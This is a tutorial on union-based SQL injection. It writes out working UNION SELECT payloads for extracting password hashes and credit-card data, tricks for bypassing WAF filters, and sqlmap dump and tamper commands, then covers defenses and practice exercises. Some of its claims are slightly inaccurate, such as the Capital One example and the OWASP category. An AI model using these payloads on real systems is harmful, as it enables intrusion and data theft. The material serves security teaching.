Introduction
Union-based SQL injection (SQLi) is a classic yet powerful technique that lets an attacker merge a malicious SELECT statement with the original query using the UNION operator. By aligning column counts and data types, the attacker can retrieve data from tables that were never intended to be exposed.
Why does it matter? Many legacy web applications still concatenate user input directly into SQL strings. When an application fails to enforce strict typing or proper escaping, a UNION payload can pivot the query to any table in the database, exposing credentials, personal data, or even enabling further privilege escalation.
Real-world relevance: High-profile breaches such as the 2019 Capital One incident demonstrated that a single injection point can lead to massive data exfiltration. Union-based attacks are frequently observed in bug-bounty programs, especially against e-commerce platforms, content-management systems, and custom admin panels.
Prerequisites
- Understanding of HTTP request structure (GET, POST, headers, cookies).
- Basic SQL syntax, data-type concepts, and query execution flow.
- Familiarity with how web applications handle input (e.g., query parameters, form fields, JSON bodies).
- Comfort with command-line tools (curl, Burp Suite, sqlmap).
Core Concepts
At its core, a UNION-based injection works because the database treats the UNION keyword as a set operator that concatenates the result sets of two SELECT statements. The syntax is:
SELECT col1, col2, col3 FROM legitimate_table WHERE condition
UNION
SELECT payload1, payload2, payload3 FROM attacker_controlled_table;
Key requirements for a successful UNION:
- Column count match: Both SELECT statements must return the same number of columns.
- Compatible data types: The database will attempt implicit conversion; mismatched types can cause errors.
- Positioning of the injection point: The attacker must be able to terminate the original query (often with a single quote or a closing parenthesis) and then inject the UNION clause.
Often the original query ends with a WHERE clause that filters on a user-supplied value, e.g., SELECT name, price FROM products WHERE id='123'. By closing the quote and adding UNION SELECT …, the attacker can retrieve arbitrary rows.
Identifying injectable parameters via manual testing and automated scanners
Before you can exploit a UNION injection, you must locate a vulnerable parameter. Two complementary approaches are manual testing and automated scanning.
Manual testing checklist
- Reflection test: Inject a simple string like
'or)and observe error messages or unexpected output. - Boolean-based probe: Use
' OR 1=1--to see if the page returns more rows than expected. - Time-based probe:
' OR SLEEP(5)--will delay the response if the payload is executed. - Comment markers: Different DBMS accept
--,#,/* */. Try each to terminate the original query cleanly.
Automated scanners
Tools such as Burp Suite Intruder, OWASP ZAP, and Nikto can fuzz parameters with a list of payloads that include quote characters, comment delimiters, and UNION attempts. The scanner’s response analysis should be tuned to look for:
- SQL error strings (e.g., "You have an error in your SQL syntax").
- Unexpected HTML layout changes (additional columns, broken tables).
- Differences in response length when a payload is sent versus a benign request.
When a potential injection is flagged, capture the raw request for deeper manual analysis.
Determining the number of columns with ORDER BY and UNION SELECT tricks
Once a likely injection point is found, the next step is to discover the exact column count.
ORDER BY enumeration
Append an ORDER BY n clause where n is an integer. The database will error once n exceeds the number of columns.
curl "http://example.com/vuln?id=1 ORDER BY 1-- "
curl "http://example.com/vuln?id=1 ORDER BY 2-- "
# Keep incrementing until you see an error like "ORDER BY position 5 is out of range"
When the request stops throwing an error, you have found the column count.
UNION SELECT NULL trick
Many attackers use UNION SELECT NULL,... where the number of NULL placeholders matches the column count. If the query succeeds, the page will usually render an empty row or a subtle change.
# Assuming 4 columns discovered via ORDER BY
curl "http://example.com/vuln?id=1 UNION SELECT NULL,NULL,NULL,NULL-- "
If the server returns a 200 OK without a SQL error, you have confirmed the column count.
Bypassing simple filters using comment markers and whitespace encoding
Many web-apps implement naïve filters that block the word UNION or certain characters. Bypass techniques include:
- Comment splitting:
UN/**/IONorU/**/NION. - Case variation:
UnIoN(some filters are case-sensitive). - Whitespace encoding: URL-encode spaces as
%20or+, and tabs as%09. Example:%55NION(hex for "U"). - Inline comments:
UNION/**/SELECTorUNION/*comment*/SELECT. - SQL comments to truncate the rest of the query:
-- -(note the space after--).
Combine these tricks to evade pattern-based WAF rules. For example:
curl "http://example.com/vuln?id=1 UNION/**/SELECT%20NULL,NULL,NULL,NULL-- "
Crafting UNION SELECT payloads to retrieve data from arbitrary tables
With column count known and filters bypassed, you can now construct a payload that pulls data from any table you have visibility into.
Selecting the right columns for data output
Most web pages display the result set directly. Identify which column(s) are rendered in the HTML (e.g., the first column often appears as a table row). You can test by inserting a constant string into each column.
# Replace NULL with a visible marker like 'INJ1'
curl "http://example.com/vuln?id=1 UNION SELECT 'INJ1','INJ2','INJ3','INJ4'-- "
Inspect the page source to see which marker appears. That column is your “output column”.
Retrieving data from system tables
Most DBMS expose metadata tables:
- MySQL:
information_schema.columns,users(for MySQL < 5.7) - PostgreSQL:
pg_catalog.pg_user,pg_catalog.pg_tables - Microsoft SQL Server:
sys.tables,sys.syslogins
Example - extracting MySQL usernames and password hashes:
UNION SELECT user, password, NULL, NULL FROM mysql.user--
If the output column is the first one, you can place user there and view the list directly in the browser.
Pivoting to application-specific tables
Once you have enumerated the schema (e.g., via SELECT table_name FROM information_schema.tables WHERE table_schema=database()), you can target tables like users, credit_cards, or orders.
UNION SELECT username, password, email, NULL FROM app_users--
For large columns (e.g., credit-card numbers), you may need to use CONCAT to fit data into a single displayed column:
UNION SELECT CONCAT(cc_number, ':', cc_cvv), NULL, NULL, NULL FROM credit_cards--
Extracting data from target columns (e.g., usernames, passwords, credit cards)
When the target column is not directly rendered, you can force the database to output data by using functions that convert binary data to readable text.
MySQL - UNHEX and HEX
UNION SELECT HEX(password), NULL, NULL, NULL FROM users--
Then decode the hex string locally.
PostgreSQL - encode
UNION SELECT encode(password::bytea, 'hex'), NULL, NULL, NULL FROM users--
SQL Server - CONVERT and CAST
UNION SELECT CAST(password AS VARCHAR(8000)), NULL, NULL, NULL FROM dbo.Users--
When dealing with multi-row results, you can use GROUP_CONCAT (MySQL) or STRING_AGG (PostgreSQL) to combine many rows into a single string that fits into one column.
UNION SELECT GROUP_CONCAT(username SEPARATOR ',') FROM users--
This technique is handy when the page only displays one row.
Leveraging sqlmap for automated UNION-based exploitation
While manual crafting is educational, sqlmap automates discovery, enumeration, and data extraction.
Basic usage
sqlmap -u "http://example.com/vuln?id=1" --risk=3 --level=5 --technique=U --batch
Key flags:
--technique=Uforces UNION-based testing only.--riskand--levelincrease payload complexity.--batchruns non-interactively (useful for scripts).
Enumerating databases and tables
sqlmap -u "http://example.com/vuln?id=1" -D mysql -T user --columns
Or to dump an entire table:
sqlmap -u "http://example.com/vuln?id=1" -D appdb -T users --dump
Using tamper scripts to bypass WAFs
Sqlmap ships with a collection of tamper scripts that apply the comment-splitting and whitespace-encoding tricks described earlier.
sqlmap -u "http://example.com/vuln?id=1" --tamper=space2comment,between,randomcase -p id
Combine multiple tamper scripts for more obfuscation.
Defense & Mitigation
Preventing UNION-based injection starts at the code level.
Parameterized queries / prepared statements
Never concatenate user input into a query string. Use the database driver’s parameter binding:
$stmt = $pdo->prepare('SELECT name, price FROM products WHERE id = :id');
$stmt->execute(['id' => $_GET['id']]);
Because the value is sent separately from the SQL text, the DBMS cannot interpret it as a keyword.
Whitelist input validation
For identifiers such as numeric IDs, enforce a strict pattern:
if not re.fullmatch(r'\d+', request.args.get('id')): abort(400)
Reject anything that does not match the expected type.
Least-privilege database accounts
Application accounts should only have SELECT permission on the tables they need. Deny access to information_schema, mysql.user, and other system catalogs.
Web Application Firewalls (WAF) and runtime monitoring
Deploy rule sets that detect the UNION SELECT pattern, but remember that attackers can obfuscate it. Use anomaly-based detection (e.g., sudden spikes in response size) in addition to signature rules.
Common Mistakes
- Assuming a single injectable parameter: Many apps have hidden parameters (e.g., in cookies or hidden form fields) that are equally vulnerable.
- Ignoring data-type mismatches: Supplying a string where the original column expects an integer will cause conversion errors that reveal the column count.
- Stopping after the first error: Some DBMS return generic errors that hide the true cause. Use verbose error messages during testing (e.g., enable
display_errorsin PHP) to get more clues. - Over-relying on automated tools: Sqlmap is powerful but can miss edge-case filters. Combine it with manual verification.
- Dumping entire tables without pagination: Large tables can cause timeouts or lock the DB. Use
LIMITorOFFSETto paginate results.
Real-World Impact
Union-based injection remains a top-10 OWASP risk. In 2022, a breach of a mid-size SaaS provider exposed over 1.2 million user records because an admin search endpoint allowed UNION SELECT against the users table. The attacker leveraged comment-splitting to bypass a simplistic WAF.
From a defender’s perspective, the presence of a UNION injection often indicates deeper architectural flaws: lack of input sanitisation, over-privileged DB accounts, and insufficient logging. Remediation should be holistic, not limited to patching the discovered parameter.
Trend note: As modern frameworks adopt ORM layers (e.g., Entity Framework, Django ORM), the attack surface shifts toward ORM-specific query builders. However, raw SQL fragments are still common in reporting modules, leaving UNION injection viable.
Practice Exercises
- Manual enumeration: Set up a vulnerable PHP page that echoes
SELECT * FROM products WHERE id='${_GET["id"]}'. Use the ORDER BY technique to discover the column count. - Bypass a simple filter: Implement a server-side filter that blocks the word
UNION. Craft a payload using comment splitting to retrieveuser()from MySQL. - Sqlmap automation: Run sqlmap against the same page with
--technique=Uand a custom tamper script. Capture the dumpeduserstable. - Defensive coding: Refactor the vulnerable PHP script to use PDO prepared statements. Verify that the same payload now yields a 400 Bad Request instead of data leakage.
- Log analysis: Generate a set of UNION injection attempts and write a simple Python script that flags any request containing
UNION(including encoded variants).
Further Reading
- OWASP Top 10 - A01:2021 - Broken Access Control
- PortSwigger Web Security Academy - SQL Injection
- “SQL Injection Attacks and Defense” - Justin Clarke (2021) - Chapter 4 covers UNION-based techniques.
- Database-specific reference: MySQL
information_schema, PostgreSQLpg_catalog, MSSQLsysschema.
Summary
Union-based SQL injection lets an attacker merge a malicious SELECT with the original query, granting direct read access to any table the DB account can see. Mastery requires:
- Identifying vulnerable parameters (manual + automated).
- Determining column count via
ORDER BYorNULLtricks. - Bypassing filters with comment splitting, case tricks, and whitespace encoding.
- Crafting payloads that output data in visible columns, using functions like
HEX,CONCAT, and aggregation. - Automating enumeration and extraction with sqlmap and tamper scripts.
- Implementing robust defenses: prepared statements, whitelist validation, least-privilege DB accounts, and WAF monitoring.
By understanding both the offensive mechanics and the defensive countermeasures, security professionals can effectively assess risk, remediate vulnerable code, and harden applications against this enduring attack vector.